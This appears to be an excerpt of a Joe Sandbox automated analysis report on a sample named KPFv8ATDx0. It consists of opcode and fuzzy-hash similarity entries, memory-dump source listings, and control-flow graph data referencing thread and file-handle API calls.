                                                    Similarity
                                                    • API ID:
                                                    • String ID: 1_^$1_^
                                                    • API String ID: 0-1270353967
                                                    • Opcode ID: 1ce88c900ef8e1d9d9426595c96e3ec29beb0a4263b34298819ac35493e8f4c4
                                                    • Instruction ID: f42fdf43aa6839be6053509d47cfc2d519ba3ece4bf4aa0f37a9509dd9d32c7c
                                                    • Opcode Fuzzy Hash: 1ce88c900ef8e1d9d9426595c96e3ec29beb0a4263b34298819ac35493e8f4c4
                                                    • Instruction Fuzzy Hash: A051B36790E3939BF356D72CD4A20E17F90AF53324708A5BBC189CA4A3ED19E45E42C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 542f6177bc37a4e7d3a072e6301ccc51efa5343c9083dfedd87feedbd5f43108
                                                    • Instruction ID: c43a4ee4f678cc8c1cb137016c254e31fd9b8cdc0fdc72de74c484fca63635e4
                                                    • Opcode Fuzzy Hash: 542f6177bc37a4e7d3a072e6301ccc51efa5343c9083dfedd87feedbd5f43108
                                                    • Instruction Fuzzy Hash: D2E115B290E7D2ABF396977C98520A57FB1BF0335471880FBC0898A5A7DD24E80D87D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4fb4bf2790951ec759a81c1d4c0199bef1bef88eddad87fc975769ef622762a3
                                                    • Instruction ID: 4b86931934542165d382192171c1059d4881fd7f92ad33fc5463d5d3277717f3
                                                    • Opcode Fuzzy Hash: 4fb4bf2790951ec759a81c1d4c0199bef1bef88eddad87fc975769ef622762a3
                                                    • Instruction Fuzzy Hash: E8A1E18AA1FBC19BF2A643AC18265F92FA26F6715070D80FBD0494B59F9444E80EC3D6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8c5180912dcb3a3738b9b07f252254c656452e22d09147a90a70ce191559b42
                                                    • Instruction ID: f37417cf12bbc5196ccd1eae57e6ab1917a93ca50015626c5040953ae5a9db26
                                                    • Opcode Fuzzy Hash: f8c5180912dcb3a3738b9b07f252254c656452e22d09147a90a70ce191559b42
                                                    • Instruction Fuzzy Hash: 0E714F70908A4D8FEBA8DF18C845BF97BE4FB59310F14812AE84EC7251DB75E985CB81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 162ec6352fb3d640cf853aef85fea127a50f623d848f4e860d579c2d8e8a0d0e
                                                    • Instruction ID: fd2b8a278878840d5de638cad857d836d17bfadef4d226e7303adb81ce2270d3
                                                    • Opcode Fuzzy Hash: 162ec6352fb3d640cf853aef85fea127a50f623d848f4e860d579c2d8e8a0d0e
                                                    • Instruction Fuzzy Hash: 6571169390F7D2EBF392437C582A1A96F61AF2365074C84FAD0884B997ED04E91DC3C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9e8b5ee9646f9a36f5578358f9215cb202543fcf457caf8249bca1a36c3a52e0
                                                    • Instruction ID: 6fcc52480302ede514e0452262b2d9cfe5e4fe992d8a662ab9ce01fec2e39e95
                                                    • Opcode Fuzzy Hash: 9e8b5ee9646f9a36f5578358f9215cb202543fcf457caf8249bca1a36c3a52e0
                                                    • Instruction Fuzzy Hash: 7871914290FBD2ABF7D382B858251B56E73AF2315075980FBD0884B49BA515EE1CC3DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7bfe5f536ac8c2a874e9709a208a47a9583a762a719a51c4ef54db4b611e46e9
                                                    • Instruction ID: 255b473225bf92e720dcdb364f5a32acd6f11d4a8a75117657e65d2d1adc55bf
                                                    • Opcode Fuzzy Hash: 7bfe5f536ac8c2a874e9709a208a47a9583a762a719a51c4ef54db4b611e46e9
                                                    • Instruction Fuzzy Hash: 8271848291FFC1AAF7D283BC082A1765FB26B6369070940FBC1490799B9454E91DC3DF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be1dc25fd105e3ef9105c68f348dfee2043967bdb933f6cafe13af758c243eb7
                                                    • Instruction ID: 42af81517238dc8e525c3df81089a394c01ca0363e537098d6c05cb2c6837f78
                                                    • Opcode Fuzzy Hash: be1dc25fd105e3ef9105c68f348dfee2043967bdb933f6cafe13af758c243eb7
                                                    • Instruction Fuzzy Hash: EC51B78290F7E2ABE79343BC44261A96F71AF2355075980FBC1894B997AC05EE1CC3D6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1363044076.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaacca0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93cccc7892812843fe8925e98984734b6c85684237fc22d73868fde8d97a446d
                                                    • Instruction ID: 072e1eb45d74115e54c1f2caaa3c620902bcff9e20ebd34bc6f1381e37a1f13e
                                                    • Opcode Fuzzy Hash: 93cccc7892812843fe8925e98984734b6c85684237fc22d73868fde8d97a446d
                                                    • Instruction Fuzzy Hash: AB314DB780E3AA0AD342F77CE4A15E6BB909E072B870C87F7C1999D2A3DC045448D7D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1357512341.00007FFAAC6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac6f0000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 354c6cbb91a4f91256cd531eefbbf5e8a29a27d3700311b39bac56402acf4c4f
                                                    • Instruction ID: 5b231c15dc32ec8e2465b09b6f9cc21d02d4fd89f39dfea5e8b1a59be6e69405
                                                    • Opcode Fuzzy Hash: 354c6cbb91a4f91256cd531eefbbf5e8a29a27d3700311b39bac56402acf4c4f
                                                    • Instruction Fuzzy Hash: 4731F670D08A1DCFDF88DF98D491AEDBBF1FBA9300F20516AD419E3281CA359945CB84
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1356150695.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffaac550000_KPFv8ATDx0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: 5b34ace8a1115f8b973b82c0c97b4298cc327aeb171151a34496bff7b73ae7eb
                                                    • Instruction ID: 3fca43769a749241d5472f25fd41d0bc175b162ae1a4e44815976caf913fed21
                                                    • Opcode Fuzzy Hash: 5b34ace8a1115f8b973b82c0c97b4298cc327aeb171151a34496bff7b73ae7eb
                                                    • Instruction Fuzzy Hash: EA51B3F6A0D46B46E24233BDB4228FD6744DF8B3B5B48CA37E04DE92B34D09608586D5

                                                    Execution Graph

                                                    Execution Coverage:5.2%
                                                    Dynamic/Decrypted Code Coverage:75%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:12
                                                    Total number of Limit Nodes:0
                                                    execution_graph 21616 7ffaac72e84d 21617 7ffaac72e85b SuspendThread 21616->21617 21619 7ffaac72e934 21617->21619 21612 7ffaac730040 21613 7ffaac73007b ResumeThread 21612->21613 21615 7ffaac730154 21613->21615 21624 7ffaac731e35 21625 7ffaac731e4f GetFileAttributesW 21624->21625 21627 7ffaac731f15 21625->21627 21620 7ffaac7301a9 21621 7ffaac7301b7 CloseHandle 21620->21621 21623 7ffaac730294 21621->21623

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 468 7ffaaccd194f-7ffaaccd1962 469 7ffaaccd1964-7ffaaccd1ca5 468->469 470 7ffaaccd19ae-7ffaaccd19c4 468->470 475 7ffaaccd1caf-7ffaaccd1cee 469->475 472 7ffaaccd1a54-7ffaaccd1a84 470->472 473 7ffaaccd19ca-7ffaaccd19d2 470->473 482 7ffaaccd1b2e-7ffaaccd1b37 472->482 483 7ffaaccd1a8a-7ffaaccd1a8b 472->483 474 7ffaaccd19d8-7ffaaccd19ea 473->474 473->475 474->475 477 7ffaaccd19f0-7ffaaccd1a07 474->477 486 7ffaaccd1cf0 475->486 478 7ffaaccd1a47-7ffaaccd1a4e 477->478 479 7ffaaccd1a09-7ffaaccd1a10 477->479 478->472 478->473 479->475 484 7ffaaccd1a16-7ffaaccd1a44 479->484 488 7ffaaccd1c6f-7ffaaccd1c95 482->488 489 7ffaaccd1b3d-7ffaaccd1b43 482->489 487 7ffaaccd1a8e-7ffaaccd1aa4 483->487 484->478 494 7ffaaccd1cfb-7ffaaccd1d91 486->494 487->475 490 7ffaaccd1aaa-7ffaaccd1ace 487->490 489->475 491 7ffaaccd1b49-7ffaaccd1b58 489->491 492 7ffaaccd1ad0-7ffaaccd1af3 490->492 493 7ffaaccd1b21-7ffaaccd1b28 490->493 495 7ffaaccd1c62-7ffaaccd1c69 491->495 496 7ffaaccd1b5e-7ffaaccd1b65 491->496 492->475 501 7ffaaccd1af9-7ffaaccd1b1f 492->501 493->482 493->487 502 7ffaaccd1d16-7ffaaccd1d96 494->502 503 7ffaaccd1d9c-7ffaaccd1ddf 494->503 495->488 495->489 496->475 498 7ffaaccd1b6b-7ffaaccd1b75 496->498 504 7ffaaccd1b7c-7ffaaccd1b87 498->504 501->492 501->493 502->503 515 7ffaaccd1d38-7ffaaccd1d98 502->515 514 7ffaaccd1de1-7ffaaccd1e36 503->514 506 7ffaaccd1bc6-7ffaaccd1bd5 504->506 507 7ffaaccd1b89-7ffaaccd1ba0 504->507 506->475 509 7ffaaccd1bdb-7ffaaccd1bff 506->509 507->475 508 7ffaaccd1ba6-7ffaaccd1bc2 507->508 508->507 512 7ffaaccd1bc4 508->512 513 7ffaaccd1c02-7ffaaccd1c1f 509->513 516 7ffaaccd1c42-7ffaaccd1c58 512->516 513->475 517 7ffaaccd1c25-7ffaaccd1c40 513->517 529 7ffaaccd1e41-7ffaaccd1ee7 514->529 515->503 522 7ffaaccd1d5c-7ffaaccd1d9a 515->522 516->475 521 7ffaaccd1c5a-7ffaaccd1c5e 516->521 517->513 517->516 521->495 522->503 528 7ffaaccd1d7d-7ffaaccd1d90 522->528 541 7ffaaccd2017-7ffaaccd2034 529->541 542 
7ffaaccd1eed-7ffaaccd2290 529->542 544 7ffaaccd2341-7ffaaccd23a8 541->544 545 7ffaaccd203a-7ffaaccd203f 541->545 553 7ffaaccd2518 544->553 546 7ffaaccd2042-7ffaaccd2049 545->546 548 7ffaaccd204b-7ffaaccd204f 546->548 549 7ffaaccd1fcc-7ffaaccd2339 546->549 548->514 552 7ffaaccd2055 548->552 549->544 554 7ffaaccd20d3-7ffaaccd20d6 552->554 553->553 555 7ffaaccd20d9-7ffaaccd20e0 554->555 556 7ffaaccd20e6 555->556 557 7ffaaccd2057-7ffaaccd208c call 7ffaaccd1ce0 555->557 559 7ffaaccd2156-7ffaaccd215d 556->559 557->544 563 7ffaaccd2092-7ffaaccd20a2 557->563 561 7ffaaccd20e8-7ffaaccd211a call 7ffaaccd1ce0 559->561 562 7ffaaccd215f-7ffaaccd21a5 559->562 561->544 570 7ffaaccd2120-7ffaaccd2148 561->570 576 7ffaaccd1f74-7ffaaccd1f78 562->576 577 7ffaaccd21ab-7ffaaccd21b0 562->577 563->514 566 7ffaaccd20a8-7ffaaccd20c5 563->566 566->544 568 7ffaaccd20cb-7ffaaccd20d0 566->568 568->554 570->544 571 7ffaaccd214e-7ffaaccd2153 570->571 571->559 578 7ffaaccd1fca 576->578 579 7ffaaccd1f7a-7ffaaccd2318 576->579 580 7ffaaccd2236-7ffaaccd223a 577->580 578->546 581 7ffaaccd21b5-7ffaaccd21e4 call 7ffaaccd1ce0 580->581 582 7ffaaccd2240-7ffaaccd2246 580->582 581->544 586 7ffaaccd21ea-7ffaaccd21fa 581->586 586->529 587 7ffaaccd2200-7ffaaccd220f 586->587 587->544 588 7ffaaccd2215-7ffaaccd2228 587->588 588->555 589 7ffaaccd222e-7ffaaccd2233 588->589 589->580
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80643edb5fef55cf9d931c3625f55e72803904f6ceb8228b57c1a87d9e86b69c
                                                    • Instruction ID: 1558c3f36054a0a61cd7e2858c440da07dc3601def9638099f36ed1933fdf2d6
                                                    • Opcode Fuzzy Hash: 80643edb5fef55cf9d931c3625f55e72803904f6ceb8228b57c1a87d9e86b69c
                                                    • Instruction Fuzzy Hash: 9C529E70919649CFEB5ECF18C4A46B87BA1FF49310F5081BED44ED7686DA38E895CB80

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d4cfb3dd0c054b6d318517602823e6fc5ab02692ba04c067ecff5735660dd2cb
                                                    • Instruction ID: e8e7fd4954384701f597610102eb5a58d947f64655aa78cbbce988d4ec2d9c05
                                                    • Opcode Fuzzy Hash: d4cfb3dd0c054b6d318517602823e6fc5ab02692ba04c067ecff5735660dd2cb
                                                    • Instruction Fuzzy Hash: DE325D70918A8D8FEBB9EF28C855BE937E1FB69301F00412AD84ED7691DF749584CB81

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e850c214b66d77a884c7bf21f1b8cf779d1db3a5d02fd7e2e83f56b9303e4b9b
                                                    • Instruction ID: b69481b3d836dbbbf6369c7bd3ba84c7005464636964de5e3d0735a6f00e7608
                                                    • Opcode Fuzzy Hash: e850c214b66d77a884c7bf21f1b8cf779d1db3a5d02fd7e2e83f56b9303e4b9b
                                                    • Instruction Fuzzy Hash: 3D322C70919A8D8FEBB9EF28C855BE937E1FB59301F00412AD84EC7691DF749684CB81
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5809d369001b92751b6552e86dc94b361dcaba80e6ba7d260184c704f5a98c0c
                                                    • Instruction ID: ea507bac5a92ff212e57c0bba02f730ca223e82fe603b5e36621b3e008bcb007
                                                    • Opcode Fuzzy Hash: 5809d369001b92751b6552e86dc94b361dcaba80e6ba7d260184c704f5a98c0c
                                                    • Instruction Fuzzy Hash: BAA1F671958A8A8FE788DB68C8657A97FE2FF95300F40407AE04DD76D2CB741856CB84

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bacab22ba18179e82cc02dd0155d560639faf2bdda2424ab19931a588d100aff
                                                    • Instruction ID: 1d750482be43d77ddaaf02144b8b08e609e33f284f1fc234bb386e4d57492e34
                                                    • Opcode Fuzzy Hash: bacab22ba18179e82cc02dd0155d560639faf2bdda2424ab19931a588d100aff
                                                    • Instruction Fuzzy Hash: 14F2737094891C8FDF99EF18C894FA9B7B1FB69305F1441A9D00EE76A1DA31AE81CF40

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 223 7ffaac730040-7ffaac730079 224 7ffaac73007c-7ffaac730152 ResumeThread 223->224 225 7ffaac73007b 223->225 229 7ffaac73015a-7ffaac7301a4 224->229 230 7ffaac730154 224->230 225->224 230->229
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1470954848.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac720000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 83ef0875b247adf487aa4e0e64a0e4b42480c5417c3f65e694e653abe0c66609
                                                    • Instruction ID: 949861b35f7fa433b92e544d3d81e3c7cca969f7744bdf2e233fbea6e49ca484
                                                    • Opcode Fuzzy Hash: 83ef0875b247adf487aa4e0e64a0e4b42480c5417c3f65e694e653abe0c66609
                                                    • Instruction Fuzzy Hash: E6517C7090C78C8FDB55DBA8C855AE9BFF0EF56310F0441AFD049EB292DA349846CB41

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 233 7ffaac72e84d-7ffaac72e859 234 7ffaac72e85b-7ffaac72e863 233->234 235 7ffaac72e864-7ffaac72e932 SuspendThread 233->235 234->235 239 7ffaac72e93a-7ffaac72e984 235->239 240 7ffaac72e934 235->240 240->239
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1470954848.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac720000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0
                                                    • Opcode ID: 47544abff329be722cc5522dee3aa6faa4e3eec90fd8aea96389bd6523eac647
                                                    • Instruction ID: d91eef6a84737378109f7932d6677afa735fcab276b7ee25e89e9e3bd4b3ffac
                                                    • Opcode Fuzzy Hash: 47544abff329be722cc5522dee3aa6faa4e3eec90fd8aea96389bd6523eac647
                                                    • Instruction Fuzzy Hash: 41416C70D0864C8FDB58DFA8D885BEDBBF0FB5A311F10416AD04DE7252DA70A845CB41

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 243 7ffaac731e35-7ffaac731f13 GetFileAttributesW 247 7ffaac731f1b-7ffaac731f59 243->247 248 7ffaac731f15 243->248 248->247
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1470954848.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac720000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: f23febe497c4e78502bfd11374cd58f4d349156fbc0722f2d3daac5568380b05
                                                    • Instruction ID: cfae0ecddde7d1209680294ec6c9878f8b6982e0acad7ac1a24d2967d4524a1a
                                                    • Opcode Fuzzy Hash: f23febe497c4e78502bfd11374cd58f4d349156fbc0722f2d3daac5568380b05
                                                    • Instruction Fuzzy Hash: 69411A70D0864C8FDB98DF98D885BEDBBF0FB5A310F10416AD00DE7252DA719845CB41

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC5B5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac5b5000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )L_H
                                                    • API String ID: 0-3235562293
                                                    • Opcode ID: e950a5640e6739aec45dee6c7c608bc80cb6c69ed551f811226269e70dcde23d
                                                    • Instruction ID: 7cc3b53e344c930e2a6660b46e24ba24b70782b03b5c0ed969ad4bf11af248d9
                                                    • Opcode Fuzzy Hash: e950a5640e6739aec45dee6c7c608bc80cb6c69ed551f811226269e70dcde23d
                                                    • Instruction Fuzzy Hash: C0C10D74A4891D8FDB98EF68C895BA9B7B2FF58300F5085A9D00DE3256DF34A985CF40

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 1cf7f17d546f2e930a8da48eea6e36b9d327ee00945c77c57550afeebf4d2ada
                                                    • Instruction ID: 62553a121c41cf725e4d8b121a720bc695fc11831f4cd19a9a24793726916080
                                                    • Opcode Fuzzy Hash: 1cf7f17d546f2e930a8da48eea6e36b9d327ee00945c77c57550afeebf4d2ada
                                                    • Instruction Fuzzy Hash: 5D513A71D0964ACFEB49DF98C4516FDBBB1EF49310F1481BED00EA7692CA34A945CB81

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 331 7ffaac7301a9-7ffaac7301b5 332 7ffaac7301c0-7ffaac730292 CloseHandle 331->332 333 7ffaac7301b7-7ffaac7301bf 331->333 337 7ffaac73029a-7ffaac7302ee 332->337 338 7ffaac730294 332->338 333->332 338->337
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1470954848.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac720000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 5502a7a6d70d4e2cb6c0fbe04b7b6d95d53a789615febd5ac7f937b85c5e7971
                                                    • Instruction ID: 630303e248f0a5231435cc5416b28dff3b48c8f927915f8e1d863617f0977c11
                                                    • Opcode Fuzzy Hash: 5502a7a6d70d4e2cb6c0fbe04b7b6d95d53a789615febd5ac7f937b85c5e7971
                                                    • Instruction Fuzzy Hash: 81416C70D0864C8FDB59DFA8C889BECBBF0FB56310F1041AED049E7292DA34A845CB41

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 341 7ffaac58af17-7ffaac58af18 342 7ffaac58af1a-7ffaac58af36 341->342 343 7ffaac58aebb-7ffaac58aec3 341->343 344 7ffaac58aece-7ffaac58aed8 343->344
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1468281331.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaac580000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7
                                                    • API String ID: 0-1790921346
                                                    • Opcode ID: 8a3367da4d5d824fa49d43bec1c3c8fd06095ee251e3d2d6b6fcbc9afe8ec201
                                                    • Instruction ID: c6a3a96c278a65ca7f915fa447fff2f6acf7eb48afac1832a6efe10993f7df06
                                                    • Opcode Fuzzy Hash: 8a3367da4d5d824fa49d43bec1c3c8fd06095ee251e3d2d6b6fcbc9afe8ec201
                                                    • Instruction Fuzzy Hash: BBE01C60A4911B8AFB309B18C854BBA77A5AF45700F1082F5D00DAA686CF749A8A9BC0

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e654acb3eac3b9ffe97d76fd9ae84d95315aa719cacc7ddf6a3467f5c8322cfe
                                                    • Instruction ID: a00d23302d6fbed20928f166155b00c968be67f698457c6a51462975b7441dad
                                                    • Opcode Fuzzy Hash: e654acb3eac3b9ffe97d76fd9ae84d95315aa719cacc7ddf6a3467f5c8322cfe
                                                    • Instruction Fuzzy Hash: BEB23270A5492C8FDF99EF18C894FA9B7B1FB69305F1041D9910EE76A1DA31AE81CF40

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5953c2337757b891998b080920106c54e2621d4acb231bd9f0f13de5367efeb5
                                                    • Instruction ID: f563007273bb235a17a6712a2d3988855c0e177e7740781840acadb56cde346f
                                                    • Opcode Fuzzy Hash: 5953c2337757b891998b080920106c54e2621d4acb231bd9f0f13de5367efeb5
                                                    • Instruction Fuzzy Hash: 54427A7094891D8FDF99EF18C898BA9B7B1FB69301F1041EAD00EE76A1DA319D85CF41

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1477945256.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ffaaccd0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4609a6c949620fa7dfc5a58514dfdb68a2cf3c30ce9677887d1738b4f4cdad1a
                                                    • Instruction ID: 94fbad41ad6ec1a455ce99801cd368f95bc5c8a1de039c43cddd44d0aa5c0313
